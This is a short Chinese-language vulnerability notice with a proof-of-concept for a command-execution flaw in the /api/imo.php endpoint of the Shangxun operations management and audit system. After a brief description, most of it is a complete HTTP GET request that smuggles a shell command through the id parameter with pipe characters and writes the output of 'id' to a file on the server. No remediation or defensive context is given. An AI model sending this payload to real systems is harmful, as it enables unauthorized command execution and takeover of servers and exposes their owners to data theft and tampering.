漏洞描述
上讯信息运维管理审计系统是一款专为企业设计的运维管理和审计系统,用于提升运维效率和安全性。系统的 /api/imo.php 接口存在命令执行漏洞,攻击者可以通过发送特制请求,利用盲注方式执行任意命令,可能导致服务器被完全控制,进而造成敏感信息泄露、数据篡改等严重后果。
上讯信息运维管理审计系统 /api/imo.php 命令执行漏洞
PoC代码
GET /api/imo.php?type=immediate&id=|id>rce.txt| HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0